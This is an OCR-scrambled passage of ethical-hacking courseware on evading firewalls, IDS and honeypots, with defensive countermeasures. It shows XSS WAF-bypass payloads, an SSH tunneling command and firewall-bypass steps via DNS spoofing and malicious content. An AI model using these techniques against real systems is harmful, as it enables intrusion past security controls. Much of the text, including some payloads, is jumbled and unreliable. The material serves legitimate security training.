443,and a user maywant to use FTP.HTTPtunneling enables FTP use via the HTTPprotocol
TheHTTPtunnel creates a bidirectionalvirtual data connection tunneled i n HTTPtraffic. It
workswiththe help of FTPclientsoftware to performprotocolencapsulation byenclosing data
packets
packets
of one protocol
are sentthrough or
suchas SOAP JRMPwithinHTTPpackets on, e.g., localport80.These
thefirewallor proxyserver as normalInternet traffic,
directedto the HTTPtunneling server softwarelocatedoutsidethenetwork.Upon
whichis then
receivingthe
packets,thisserver
unwraps the FTPdataandredirectsthe packet to the remote FTPserver.

az

HTTPTunneling
Tools
SomeHTTPtunneling
toolsare as follows:
=
NetworkTunnel
Super
Source:http://www.networktunnel.net
SuperNetworkTunnel is a two-wayHTTPtunneling softwarethat connects two
computersusing HTTP-TunnelClient and HTTP-TunnelServer.It works like VPN
tunneling but uses the HTTPprotocol to establisha connection for accessing the
andprovides
Internet without monitoring an extra layerof protection
againstattackers,
spyware,identity theft,and so on. It can bypass any firewallto surfthe web,use IM

ical andCountermensores
Mackin ©by E-Comel
Copyright
applications,
games,andso on. Further, the SocksCap
it integrates functionalong
with
bidirectionalHTTPtunneling
andremote controlto simplify
the configuration.
Thistool allowsHTTP, HTTPS, andSOCKStunneling of any TCPcommunication between
any client-serversystems, TheTCPtraffic is sent from the client to the server via
standard HTTP POST requests, which allows penetrating throughfirewalls,proxy
servers, andso on, whereHTTP trafficpasses,
Theclientsideof a tunnel is the Super NetworkTunnelclientapp, whichlistenson a
particularTCPportfor incomingrequests. Oncetherequest comes,theprogramcreates

and
an HTTP/HTTPS
server
a
tunnelto theserver sendsdatathrough
NetworkTunnelserver, whichsimply
runningon the server computer
it. The side is Super
forwardsthe data to the intendedrecipientapp
or LAN.Bothclientand server sidessupportmultiple

tunnels
multiple
through
and
the connections same tunnelat the same time.

4%
Oo. B-.2

ot
onCoered ClovTaatnecccecnieaa
Toto
[erie

HTTPort and HTTHost

Figure
of Network
12.48:Screenshot Super T unnel

Source:https://www.targeted.org
HTTPortallowsusers to bypass the HTTPproxy,whichblocksInternetaccessto e-mail,
instant messengers,P2? file sharing,ICQ,News,FTP,IRC, and so on. Here,the Internet
softwareis configured so that it connectsto a localPCas if itis the required remote
server. HTTPort then intercepts that connection and runs it through a tunnel through
the proxy.HTTPortc an work on devicessuchas proxiesor firewallsthat allow HTTP
traffic.Thus,HTTPort providesaccess to websites and Internet apps. HTTPort performs
tunneling
of
usingone two modes:SSL/CONNECT
ical
modeor a remote host.

andCountermensores
Mackin ©by E-Comel
Copyright
 In the SSL/CONNECT mode,HTTPortcan makea tunnel through a proxyall byitself.It

requiresthat the proxy shouldsupport

HTTP. Most proxies havethismethoddisabled
HTTPfeature,
a particular specifically,
bydefault.The SSL/CONNECT
cannot be used,
muchfaster,but i n this case, encryption
CONNECT
modeis,
andthe proxy can trackall
actions
The remote hostmethodis capable of tunneling through any proxy. HTTPortu ses 2
specialserver softwarecalled HTTHost, which is installedoutsidethe proxy-blocked
network.It is a web server; thus,whenHTTPortis tunneling, it sends
a series of HTTP

to
requests the HTTHost.Theproxy responds
allowsthe user to do so. HTTHost,
as
if
in turn, performs a
the user is surfingwebsite andthus
its halfof the tunneling
communicates with the targetservers. Thismode is muchslowerbut worksi n most
and

casesandfeatures strongdataencryption thatmakesproxylogging useless.

fb tthe

1 2.49:Screenshot
Figure of HTTPortand HTTHost
Other HTTPTunneling
Tools
© Tuna (https://github.com)
© HTTPTunnel(http://http-tunnel.sourceforge.net)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Firewallsthrough
Bypassing the SSHTunneling
Method

openssat
pensst |
|
MtiekersureOpenSSH to
eneryt
net avoid detection the
traffic
machine
remote
andtuna
bytheperimeter
secu controls
rom l oa ta

SSHTunneling
Tools:Bitvise and Secure Pipes
SecurePipes

Bypassing Firewalls through the SSHTunneling Method

SSHprotocol tunnelinginvolvessending unencrypted networktrafficthrough an SSHtunnel.
For example,supposeyou want to transferfileson an unencrypted FTP protocol, but the FTP
protocol Theunencrypted
is blockedon the targetfirewall. datacan besent over theencrypted
SSHprotocol using SSHtunneling. to bypass
Attackersuse this technique firewall restrictions.
Theyconnect to external
SSHservers andcreate SSHtunnelsto port80 on the remote server,
thereby
bypassing firewallrestrictions.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackersuse OpenSSH(OpenBSD SecureShell) andtunnelall trafficfroma local
to encrypt
machineto a remote machineto avoiddetectionbyperimetersecuritycontrols.OpenSSHis a
set of computerprogramsthat provideencrypted communication sessionsover a computer
networkusing theSSHprotocol.
Example:
ssh -f usergcertifiedhacker.com -L 5000:certifiedhacker.com:25 -N

=>=>
-£ =>
background
mode,user@certifiedhacker.com username and server
you are
logging
into,-L 5000: certifiedhacker.com:25 local-port:host:remote-port,
and -N
Do not execute thecommand o n the remote system.

«

os.oF,

Tunneling
‘SSH Tools
SomeSSHtunneling
toolsare listedbelow:

Source:https://www.bitvise.com
BitviseSSHServerprovides secure remote login capabilitiesto Windows workstations
andservers byencrypting dataduring transmission.Itis idealfor remote administration
of Windowsservers, for advanced users whowishto accesstheirhomemachine from
work or their work machinefrom home,and for a wide spectrum of advancedtasks,
suchas establishinga VPN usingthe SSHTCP/IP tunneling featureor providing a secure

file
depository
SFTP.
using
BitviseSSHClient for Windowsincludesterminal emulation,graphical as well as
command-line SFTPsupport,an FTP-to-SFTP bridge, tunneling features—including
dynamic portforwarding through an integrated proxy—and remote administrationfor
SSHServer.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 12:51:
Figure Sereenshotof
vise
SecurePipes
Source:https://www.opoet.com
Secure Pipes SSHtunneling
is an OSX-based software.Some of the featuresof Secure
Pipes
©
are
as follows:
RemoteForwards:Selectively openup accessto application portsthat are usually
not easily owingto networkor service provider
accessible configurationrestrictions.
Open the door to quickly
leverage
OSXServero n Internet-facing applications such
as emailand web hosting,
LocalForwards:Open application
communication ports to remote servers without
openingthoseportsto public networks.Bring the security
of VPNcommunication to
clientsand servers on an ad hoc basiswithout the hassleof configuration and
management.
SOCKS Proxies:Easily
set up and managea SOCKS proxy server for either a local
client or a wholenetworkto privatizecommunication andovercome localnetwork
restrictions.Thesetunnelsare an indispensable
and lightweight tool whentraveling
abroad, performingdigital or simply
currency transactions, securinga localnetwork.

12:52:
Figure Screenshot
ofSecurePipes

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Bypassing theDNSTunneling
Firewalls through Method

(©ONSoperates User Datagram

using (UP adit has 255-bylit
Protocol on outbound
quetes

Thissmal

by
sie constrant on extemal
exfitration various malicious
queries
enttes
allows
the ONStobeusedas an
eal hole to perform
data

‘Since
corvptor malicious
datacanbe
<etec this abnormality sscrety
n ONStunneling
embedded
int theONS
protocol even ONSSEC
packets, cannot

1s effectively selbymalware
andtheC&C sever
to bypass
communication
between
thefirewallo maintain thevet machine

5 NST (ps/soureforge.net),
Heyoka (it:/heyokosourceforge
traffic
Tools
such netus),and
lone (htos//c0dekro.se)
ve thistechni of tunneling across DNS
p ot 53

Firewalls through
Bypassing the DNSTunneling
Method
DNSoperates usingUDP, and it hasa 255-byte limit on outbound queries.Moreover, it allows
onlyalphanumeric charactersand hyphens. Suchsmallsize constraints on externalqueries
allow DNSto be usedas an idealchoice to perform data exfiltration byvarious malicious
entities. Since corruptor maliciousdata can be secretly embeddedinto the DNSprotocol
packets, even DNSSEC
malwareto bypass
cannot detectthe abnormality i n DNS
tunneling.
It is effectively
the firewallto maintain communication betweenthe victim machineand
usedby
the
C&C
server.
Toolssuchas NSTX(httos://sourceforge.net), Heyoka (http://heyoka.sourceforge.netuse), and
lodine (https://code.kryo.se)use thistechniqueof tunneling trafficacross DNSport53.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Firewallsthrough
Bypassing External Systems

© Me
icon
|@ Meron
Am maraeeteraoten @Ths enroom commande
et
thao

ven taker we

DSB

Firewalls through
Bypassing External Systems
Attackers can bypass firewallrestrictions of targetnetworksfroman externalsystem
that can
access the internalnetwork.Thisexternalsystem can be:
+

=
Ahome
machine
ofemployee
Amachinethatconducts
and
remote administration
ofthetargetnetwork
=
networkbutlocatedat a different
Amachinefromthe company’s place
Steps
to befollowed
4.
to a
bypassfirewallthrough
externalsystems:
user workswith some externalsystem
Legitimate to access the corporate
network
2. Attackersniffsthe user trafficandstealsthe session ID andcookies
3. Attacker accessesthe corporate networkbybypassing the firewalland gets the
WindowsIDof the running Mozillaprocesson the user'ssystem
Attackerthen issues an OpenURL()
command
to the foundwindow
User’s
web browser to the attacker's
is redirected webserver
Themalicious
codeembeddedi n the attacker'swebpageis downloaded
andexecuted
onuser’s
the machine

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Firewallsthrough
Bypassing MITM Attacks
(©inwiTmattacks,
attackers make
use
of
ONS
serversandrouting
techniques firewallrestrictions
to bypass

evnceecmcer|| EB?
EBEs

fe
e
—— =

&
Firewalls through
Bypassing MITM Attacks
Most securityadministratorsfocuson the possibility of an external or internal network
bypassing their firewallwhileignoringthe factthat firewallscan be bypassed usingMITM
attackson DNSservers. In MITM attacks, attackersuse DNSservers and routingtechniquesto
bypass firewallrestrictions. They mayeithertake over the corporate DNSserver or spoof ONS
responses to perform the MITM firewallattack.
Stepsto befollowedto bypass a firewallthrough MITM attacks:
1. Attackerperforms
DNS
server
poisoning
A forwww.certifiedhacker.com
2 User requests fromthecorporate
DNSserver sendsthe IPaddress(127.22.16.64)
3 Corporate
DNSserver
oftheattacker

A
4. User accesses
theattacker'smalicious
server
5 Attackerconnectsto the realhostandtunnelsthe user’s
HTTPtraffic
6. Themalicious
codeembeddedi n the attacker'sweb pageis downloadedandexecuted
on the user's machine

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Firewallsthrough
Bypassing Content

In thismethod, the attacker

sends
thecontentcontainingmalclous cadetothe user
trickshive to openits thatthemalicious
‘and codecan b e executed

Examples:
Sending
an

email
containing
ofa macro bypass
capable
a

exploit
executable
malicious
file
Microsoft
or ofce document

Thereare manyfileformatsthatcan beused as a malicious

contentcarier

Firewalls through
Bypassing Content
In this method,the attackersendscontent containing maliciouscode to the user and tricks
him/her into openingit so that the maliciouscodecan beexecuted. Forexample, an attacker
can senda n emailcontaining 2 maliciousexecutablefile or Microsoftofficedocumentcapable
of exploiting a macro bypass exploit.Attackers can alsotarget WWW/FTP servers and embed
Trojan horsefilesas softwareinstallationfiles,mobilephone software,
andso on to lure users
into accessing them.Thereare many file formatsfor text, multimedia, and graphics content
that can beusedto carry
Commonly
malicious
content.
usedfile formatsfor carrying maliciouscontent are
+
COM,BAT,PS,PDFCDR(Corel
EXE, Draw)
+
DVB,DWG(AutoCAD)
=
SMM (AMI
Pro}
+
DOC,
XLS,
DOT,
XLB,
Word)
CNY,
ASD(MS

Excel)Access)
XLT(MS
ADP,MDA,MDB, MDZ(MS
MDE,MON,
V0
(Visio)
MPP,MPT(MS
Project)
PPT,PPS,
POT(MSPowerPoint)
MSG,
OTM(MS
Outlook)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 theWAFusing an XSSAttack
Bypassing
attack
server input
responsesin
and the
‘end-users of
the
"@ANXSS expats wloerabties

|G -tocers injecmalcous
that ocur whileprocessing parameters

H TMLcode
a webaplication
Inthevictim webste to bypass
theWAF
“©
consider thefolowing
X S payload

to the
ASCHvalues bypass WAF
‘Using

Hexto
bypass
the
WAF
‘UsingEncoding

Aer the WA
Obfarcation to bypass
‘Using

12 encoding
te 5 poond,

Bypassing using XSS

the WAF an Attack
XSSattackexploits
andthe server responses of
vulnerabilitiesthat occur
while processingthe inputparameters
i n a webapplication.
Attackerstakeadvantage
HTMLcodeinto the victim websiteto bypass
to injectmalicious theWAF.
end users
ofthesevulnerabilities

=
Using
bypass
ASCIIvaluesto
In this technique,
theWAF
attackersuse ASCIIcharactersto bypass the WAF.For example,
the
consider
<script>alert
XSS
following payload
</script>
("SS")
Whenthe aboveJavaScript the WAFfiltersescapesingle
codeis executed, quotes,
doublemagic quotes,etc. Hence,
the abovepayloadis filtered bythe WAF.To bypass
the WAF,we needto convert the abovepayloadinto its equivalent ASCIIvaluesand
then execute it. TheJavaScriptwill automatically
convert the ASCIIvaluesbackinto the
originalcharacters. to convert an XSSpayload
Attackersuse online websites into its
ASCIIequivalent. Alternatively,
the HackbarMozillaaddoncan be used to get ASCII
values.
Consider the XSSpayload givenbelow:
X35 Payload:alert ("X35")
Theequivalent ASCIIvaluesare
String. fronCharCode(97,108, 101, 114, 116, 40
Theabovevaluesare insertedinto the XSSpayload:

34,
Theabovepayload theWAFfilters
bypasses
(97,successfully
<acript>String.fromCharCode 108, 101, 114 Fry
41)</script>

Modul2 Page1576 ical andCountermensores

Mackin
©
Copyright
by E-Comel
UsingHexEncodingto bypassthe WAF
In thistechnique,
the entire XSSpayload
is replaced
with Hexvaluesto bypass
WAF
Attackers use
‘websites
online
ttp://www.convertstring.com/EncodeDecode/HexEncode
such as
payload
to convert the XxSS
intoequivalent
<script>alert
consider
example,
Hexvalues.For
</script>
("X88")
the
following payload XSS

Theencodedvaluefor theXSSpayload
is

34724698708
7443E.
Theabovepayload
7386
830873%6396987247087493E06186C65872¢7482082245985385342242983C82F

bypasses
the WAFfilterssuccessfully.
Using Obfuscation to bypass
theWAF
Attackersuse the obfuscationtechnique
to bypass the WAF.In thistechnique,
attackers
use a combinationof upper-and lower-caseletters i n the XSSpayload.
For example,
considerthe followingXSSpayload:
<scriptoalert </script>
("X58")
theabovepayload
obfuscation,
Using is replaced
with
</script>
<SCRiPt>abeRT("X88")
Theabovepayload
bypassestheWAFsuccessfully

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

@ | wore teaon

IDS/FirewallEvading
Tools

19
‘TraficProfessional

IDS/Firewall Tools
Evading
During firewall evasion, attackersuse various security-auditing
tools that assess firewall
behavior.This section lists some of these tools that helpattackersto bypass firewall
restrictions. Theyautomate the processof bypassing firewall rules while increasing
effectiveness andconsuming lesstime.

ical
Mackin
and ©by CountermensoresCopyright
E-Comel
 Traffic1@
Professional
Source:https://www.idappcom.com
Traffic1QProfessional
is a tool that auditsandvalidatesthe behaviorof security
devices
bygenerating the standardapplication trafficor attack trafficbetweentwo virtual
machines.Thistool is generally
usedbysecurity personnel for assessing,auditing, and
testingthebehavioral characteristics ofanynon-proxypacket-filtering device, whichcan
includeapplicationfirewalls,
IDS, IPS,routers, switches, etc. However, as this tool can
generate custom attacktraffic,i t is extensivelyemployed by attackers to bypass the
perimeter
installed devicesi n the targetnetwork.

5 3

SomeadditionalDS/firewall
12.5: Screenshot
Figure
evasion toolsare as
of
Trafic
follows:
a Professional

=
Nmap(https://nmap.org)
=
(https://www.metasploit.com)
Metasploit
=
Inundator(https://sourceforge.net)
(https://github.com)
IDS-Evasion
(hetp://nullsecurity.net)
Hyperion-2.0

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PacketFragment
GeneratorTools

PacketFragment GeneratorTools
Thereare various packetfragment that attackersuse
generators to perform
fragmentation
attacks
o n firewalls
to bypassthem.
=
Colasoft PacketBuilder
Source:https://www.colasoft.com
ColasoftPacketBuilder is used to create custom network packets and fragmenting
packets.
Attackers use thistoolto create custom malicious andfragment
packets them
suchthat firewallscannot detectthem.They can create customnetworkpacketssuchas
EthernetPacket,ARP Packet, IP Packet, TCPPacket, and UDP Packet.Security
professionals use this tool to checkyour network'sprotection againstattacksand
intruders.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure
22.56:
Screenshot
ofColasoft
Packet
Builder
Someadditionalpacket toolsare listedbelow:
generator
=
CommView (https://vww.tamos.com)
Pro(https://www.netscantools.com)
NetScanTools
*
Ostinato(https://ostinato.org)
WANKiller(https://www.solarwinds.com)

WireE
it (https://wireedit.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

1S, 1P5,Firewall,andHoneypot

Detecting
Honeypots
(©Atacers
can of by
determinethepresence
honeypot theservices running
probing onthe system

specif
service
Ports
a
that show
a
connection runningbt handshake
deny three-way inate the presence

ols safe
oneypot
detet
ooo to detect
detoct honeypots:
1

©
Send

ope
Hater(ta:/mwmsendsofecom)

tpe//oeha.com)

Detecting
Honeypots
are trapsset to detect,
Honeypots deflect,
or counteract unauthorizedintrusion attempts.
Whileattempting to breakinto the targetnetwork,attackersperform
honeypot detectionusing
various toolsandtechniques. thesetoolsandhowthey
Thissection discusses a re used.

honeypot
‘A is an Internet systemdesignedprimarily
for diverting bytricking
attackers or
attractingthem duringtheir attemptsto gain unauthorizedaccess to informationsystems.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackers can determinethe presenceof honeypots byprobingthe services runningon the
system.Attackersuse honeypot detection systemsor methodsto identify the honeypots

particular
They
craft
installedo n the targetnetwork.
HTTPover SSL(HTTPS), SMTPover SSL(SMPTS),
service runningbut denya three-way
probe
malicious packets
to scan forservices suchas
andIMAPover SSL(IMAPS).
handshake
Portsthat show
connection indicatethepresenceof a
a honeypot.Oncetheydetecthoneypots, attackerstryto bypassthem so that theycan focus
the actualnetwork.
on targeting Toolsto detecthoneypots includeSend-safe Honeypot Hunter
(http://www.send-safe.com)
and kippo_detect(https://github.com),
Note: Attackerscan also defeat honeypots
byusing multi-proxies and hiding
(TORs) their
and
steganography
conversation usingencryption
techniques.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Detecting
and Defeating
Honeypots

by 2
(@ famataceris presenton thesme networkastheLayer aps, ten thetake an

which
of
black
detectthe presnceof
ths daemon lookingat theresponseswithuniqueMACaddress
set et at nd hole

theIEEE
‘observe
MAC
forthe currant
s tandards of
ange addresses
and to VMWare
Ie

the
Detecting presence
|

Detecting
and Defeating
Honeypots
(Cont'd)
‘Anal
2s
thees such /poe/mouns,foceitertups
andproce, whiehcontain

Se logs tat
everyting acest a rea before othe
transerngt network,

|, ©outzinsone
srahz the
Snater
packets
packet pacts opiate
hot sytemandidentyng
te
med
medeaon
through

‘Observe
TCP/IP
parameters
sucha ive
spec Run
epT e the T i m e
(RTT) To (T70,

SO
Detecting and Defeating Honeypots Eee
A honeypot is a security mechanism that is deployedto counterattackandtrap attackers.
Honeypotslure attackersinto performing maliciousactivities,
and this attack information
provides
insights into the leveland typeof threatsa network infrastructure can face.As an
attacker,
determining whetherthe targetsystemis a legitimate one or a honeypot is essential
to compromise the networkwithoutbeing detected.Identifying anddefeating thesehoneypot
stealthily
establishments taskof a professional
is the fundamental hacker.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Sometechniques used to identify,
detect,and defeatvarious honeypot
infrastructures
are
discussed
below:
Detecting the presenceof Layer 7 Tar Pits:Tar pitsare security entities that are similar
to honeypots, whichare designed to respond slowly to incomingrequests. They slow
downunauthorizedattemptsof hackers.Layer 7 tar pitsreact slowly to incomingSMTP
commands byattackers/spammers. Attackerscan identify the presenceof Layer 7 tar
pitsbylooking at the latency
of the responsefromthe service.
Detecting thepresenceof Layer 4 TarPits:Layer 4 tar pitsmanipulate theTCP/IP stack
and are effectivelyemployed to slowdownthe spreading of worms, backdoors, etc. In
thesetar pits,the iptablesaccept the incomingTCP/IP connection and spontaneously
switchto a zero-windowsize, blocking the attackerfrom sending further data.This
connection cannot beterminatedbythe attacker, as n o data is transferred to the target
machine.Layer 4 tar pitssuchas Labreacan be identifiedbytheattackerbyanalyzing
the TCP windowsize, wherethe tar pit continuously acknowledges incomingpackets
even though
theTCPwindowsize is reduced
to zero.
Detecting
the presenceof Layer2 TarPits:If an attackerlaunchesa n attackfromthe
same network,
the issue of Layer 2 tar pitsare usedto blockthe network
2 arises, Layer
of the attackerwho gainsaccess to the network as well as to prevent
penetration
internalthreats.Theattackercan detectthe presence of thisdaemonbylooking at the
responses with the uniqueMACaddress0:0:F-f:ff:ff, whichacts as a kindof blackhole.
attackercan also identify
‘An the presenceof these tar pits byanalyzing the ARP
responses,
Detecting Honeypots runningon VMware:VMWareis a commercially availablevirtual
machinethat is usedto launch multipleinstancesof a n OSsimultaneously. Thesevirtual
machinescan be configured with various virtual machineresources suchas CPU,
memory,disks, I/Odevices,etc. Owing to its numerous advantages, VMWare is widely
usedto launchhoneypots. Attackerscan identify instances that are runningon the
VMWare virtual machinebyanalyzing the MAC address.By looking at the IEEE
standardsforthe current rangeof MACaddresses assigned to VMWareInc., an attacker
can identify
the presenceof VMWare-based honeypots.
Detecting
the presenceof Honeyd Honeyd
Honeypot: used honeypot
is a widely
daemon.It is usedto create thousandsof honeypots easily.It is a network-simulated
andservice-simulatedhoneypot deployment engine.Thishoneyd honeypot can respond
toa remote attackerwho tries to contact theSMTPservice withfakeresponses.

¥ °e e
Lb Ossie —_:,
Figure
fake
12.57:Honeyd cesponse

ical andCountermensores
Mackin ©by E-Comel
Copyright
 can identify
{Anattacker the presenceof honeyd honeypot byperforming
time-based
TCPfingerprinting
methods(SYN The following
proxy behavior). figure
showsthe
betweena response to a normalcomputerandthe responseof honeyd
difference
to
a
honeypot manual SYNrequest
sent
by
an attacker

ike
smuncx

Detecting
Figure
to
Scequest
Response
12.58:
YN
by
normal
Honeys
Honeypot
computer
the presenceof User-ModeLinux(UML)
vs.

Honeypot: User-ModeLinux is an
open-sourcesoftwareunderGNU,whichis used to create virtualmachinesand is
efficienti n deploying honeypots.
Attackerscan identify
the presenceof UMLhoneypots
byanalyzing
filessuchas /proc/mounts,
/proc/interrupts,
and/proc/emdline,
which
contain UML-specific
information.
Detecting
the presenceof Sebek-basedHoneypots:
Sebekis a server/client-based
honeypot
application the rootkits andother malicious
that captures malwarethat
hijacks
the read{) systemcall.Suchhoneypots via reading
recordal the dataaccessed ()
call.Attackersc an detectthe existence of Sebek-based honeypotsbyanalyzingthe
congestionin the networklayer,as Sebekdata communication is usually
unencrypted.
SinceSebeklogseverythingthat is accessed
via reading
()callbeforetransferring
to the
network,
it causesthe congestioneffect
Detecting
is mainly
the presenceof Snort_inline
Snort IDSthat is capable
of packet
usedin Genll (2ndgeneration)
Snort
Honeypot: _inline
manipulation.
i s a modifiedversion of
It can rewrite rulesi n theiptables
honeynetsto blockknownattacksandavoid
and
attackerbouncing. Attackerscan identify these honeypots byanalyzing the outgoing
packets. If an outgoing packetis dropped,it might looklike a blackhole to an attacker,
andwhenthe snort_inline modifiesan outgoing packet, the attackercan capture the
modified packet through anotherhostsystem andidentify the packet modification,
Detecting the presenceof FakeAP: Fakeaccess pointsare thosethat create fake
802.11bbeaconframeswith randomly generated ESSIDand BSSID(MAC address)
assignments, Fakeaccesspointsonlysendbeaconframesbut do not produce any fake
trafficon the access points, andan attackercan monitor the networktrafficandquickly
note the presence offakeAP.
Detecting the presenceof Bait and SwitchHoneypots: Bait and switchhoneypots
actively participate i n securitymechanisms that are employed to respond quicklyto
incomingthreatsandmalicious attempts.They redirectall maliciousnetworktrafficto a
honeypot after any intrusion attemptis detected.An attackercan identify the presence
of suchhoneypots bylooking at specific
TCP/IP parameters suchas theRound-Trip Time
(RTT), the TimeTo Live (TTL), andthe TCPtimestamp.

Module2 Page1596 ical andCountermensores

Mackin
©
Copyright
by E-Comel
 DetectionTools:Send-SafeHoneypot
Honeypot Hunter

[stsHoneypot
of Hunter
|@ SendSafe

HTTPS
SOCKS
proses
and
i tol for checking
designed
for "*honey
pot

Features

DetectionTools
Honeypot
Attackersuser honeypot Honeypot
detectiontoolssuchas Send-Safe Hunter(http://www.send-
safe.com) and kippo_detect (https://github.com)
to detect honeypotsi n the target
organizationalnetworks.
+
Honeypot
Send-Safe Hunter
Source:http://wwwsend?-safe.com
Send-Safe Hunteris a tool designed
Honeypot for checking
listsof HTTPS
andSOCKS
proxiesfor
Features:
"honey
pots."

‘Checks
listsof HTTPS, SOCKS4, andSOCKSS proxieswithanyports
Checks
several remote or localproxylists
at once
Canupload
Canprocessproxylists
"All
"Validproxies"and excepthoneypots'
automatically
i n every specified
period
filesto FTP

Maybeusedfor usual
proxylist
validating as well

ical andCountermensores
Mackin ©by E-Comel
Copyright
 (@
end-SoteHoneypot
Hunter 32

[CFierHongyet
Proofstocheck Pron
Hurt>)
[] Send Sl e DEWOVetva

oie: Fins
Vek

ee
SlHomet
DEMO (CF
WSEAS Harte oe

Bonet
Send
Sate
Bonen
Fes Hare
DEMO
Hae
1AtewcrrenyeasVer
[6
Coganles 6
(@enSend
SueHermpa
Hermpa
OEM)

1s poi:
Nutro

Cormetn [TSR
ine Poe:
ead. (5p

Naber cretie:
[15
[7
Liter
lp,
SMTP
[raze
[25
Oe

RRL
Cec

st[0 boe:
lWitelogtoe Loglevet NoLepona
TO oe eve TResatcheckPw [AUTO

em 0100.00 StatedN/A

12.5%
Figure Sereenshotof
SendSafeHoneypot
Hunter

Module2 1588
Page tical andCountermensores
Making by Comet
Copyright©
 ModuleFlow

@ | werrrovasvasioncountermennarn

IDS/Firewall Evasion Countermeasures

The previoussections discussedvarious tools andtechniquesusedby attackersto bypass
networksecurityperimeterssuchas IDS, firewalls,
andhoneypotsto enter targetnetworks.It is
necessary to deployandconfigure thesesecurity mechanismssecurely to avoid attacks.
This
section discusses for hardening
various countermeasures and best practices suchnetwork
security
perimeters.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to DefendAgainst
IDSEvasion

‘aie
nominee
pt ony th ‘or h

at ca
norman tn tor

How to DefendAgainst IDS Evasion

=
Shutdownswitchports withknownattackhosts.
associated
+ an in-depth
Perform analysis
ofambiguousnetworktrafficfor all possible
threats.
‘UseTCPFIN or Reset(RST)
Lookfor the nop opcode
to
packet terminate maliciousTCPsessions.
the polymorphic
otherthan 0x90 to defendagainst shellcode
problem.
Trainusers to identifyattackpatternsand regularly update/patchall the systems and
networkdevices.
Deploy IDSafter a thorough of the networktopology,
analysis nature of networktraffic,
andnumberof hoststo monitor.
Usea trafficnormalizer to remove potential ambiguity fromthepacket stream before it

the
reaches IDS,
Ensurethat IDS normalizefragmented packets and allow those packets to be
reassembled in the properorder.

DefineDNSserver for clientresolveri n routers or similarnetworkdevices.

Hardenthesecurity of all communication devicessuchas modems, routers,etc.
If possible,
blockICMPTTL expired packets at theexternalinterface leveland change
the TTLfield to a considerable value, ensuringthat the end host always receives the
packets.
Regularly
update
the antivirus signature
database
Usea trafficnormalization
solutionat the IDSto protectthe system
fromevasions.
IP,victim IP,timestamp)
Store the attackinformation(attacker for futureanalysis.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to DefendAgainst
FirewallEvasion

earnest
a |Err
ais
nt rane
wh
mh
‘i sroete de vera sr ot
mane rnb
olce

How to DefendAgainst
Firewall Evasion
The firewallshouldbe configured
suchthat the IP addressof an intrudershouldbe
filteredout.
Setthe firewallrulesetto deny
alltrafficandenableonlytheservices required,
If possible,
create a uniqueuser ID to run the firewall services insteadof runningthe
usingtheadministratoror root ID.
services

Configure
a remote syslog server andadopt strict measuresto protectit frommalicious

Monitor
firewall
disable
Bydefault,
logs
at regular
all FTPconnectionsto or fromthe network
all suspiciousogentries found.
intervalsandinvestigate

andreview all inbound

Catalog andoutbound traficallowedthrough
the firewall

identify
vulnerable
Runregular
riskqueriesto
Monitor user access
firewallrules
to firewallsandcontrolwho can modify
the firewallconfiguration.
Specify
the source anddestination IP addresses
as well as the ports.

Notify policy
thesecurity administrator
aboutfirewallchanges
anddocument
them.
accessto the firewall
Controlphysical
Takeregular
backups
of thefirewallrule set andconfiguration
files.
regular
Schedule firewallsecurityaudits.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Summary

Inthis
>
mode,
have
theand
we discussedfollowing
honeypot
105,18,frewal.and concepts solutions

to bypass Sean
\oroustechnigvs firewalls
Vriout105/Fewall
vation tools

Weconcludedwithadetaleddzcusson on various countermeasurestht should

be
i n order
‘employe t o preven I0S/Frewall
evasion attemptsbythreatactors
Inthe nextmad,
perform
pen-testes,
hhumbers
web
andpasswords
wehacking hackers
server
wl cuts in deta ow attackers,a swelas etic
formationsuch
to getvaluable
and
scedt card

Module Summary
Thismodulediscussed differentIDS,IPS, and honeypot
firewall, conceptsandsolutions. It also
describedvarious techniquesfor bypassingIDSandfirewalls.In addition,
it illustratedvarious
it explained
evasion tools.Further,
1DS/firewall howto detectanddefeathoneypots. Finally,it
ended with a detailed discussionof various countermeasures to be adopted to prevent
1DS/Firewallevasion attempts bythreatactors.
In the next module, i n detail howattackersas well as ethical
we will discuss hackers
andpen-
testers perform web server hacking to gain valuableinformationsuchas creditcardnumbers
andpasswords.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module13:
Hacking
WebServers
 Module Objectives
Web
UnderstandingServer

Understanding
Concepts

WebServerAtak

Understanding
WebServerAtackMethodology

Module Objectives
Most organizations considertheir web presenceto be an extension of themselves.
Organizations maintainwebsites associated with theirbusinesso n the World Wide Webto
establishtheir web presence.Webservers are a criticalcomponent of web infrastructure.A
single
vulnerabilityin web server configuration may lead to a security breachon websites.
Therefore, is criticalto the normalfunctioning
webserver security of an organization.
Thismodulestarts with an overview of web server concepts.Subsequently,
it provides
insight
into various w b-serverattacks, attackmethodologies,andattacktools. Later,the module
describes countermeasuresagainst web server attacks,
patchmanagement, andsecuritytools.

[AtDescribe
+
will
theendof this module,

concepts
webserver
you beableto dothe following

+
various
web
webserver
Perform

attack
Describe server
attacks
methodology
Usedifferentweb server attacktools
Applyweb server attackcountermeasures
Describepatch management concepts
Usedifferent
webserver security
tools

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

WebServer WebServer

Concepts
WebServer

‘itacks ttack
‘Methodology

e °e
Counter:
Patch
e
measures
WebServer

Management Security
Tools

Web Server Concepts

To understandweb server hacking, itis essentialto understand including
web server concepts,
whata web server is, howit functions,andother elements withit
associated
Thissection providesa brief overview of a web server and its architecture.It will alsoexplain
common factorsor mistakes that allow attackersto hacka web server. This section also
describesthe impactof attackson web servers

ical andCountermensores
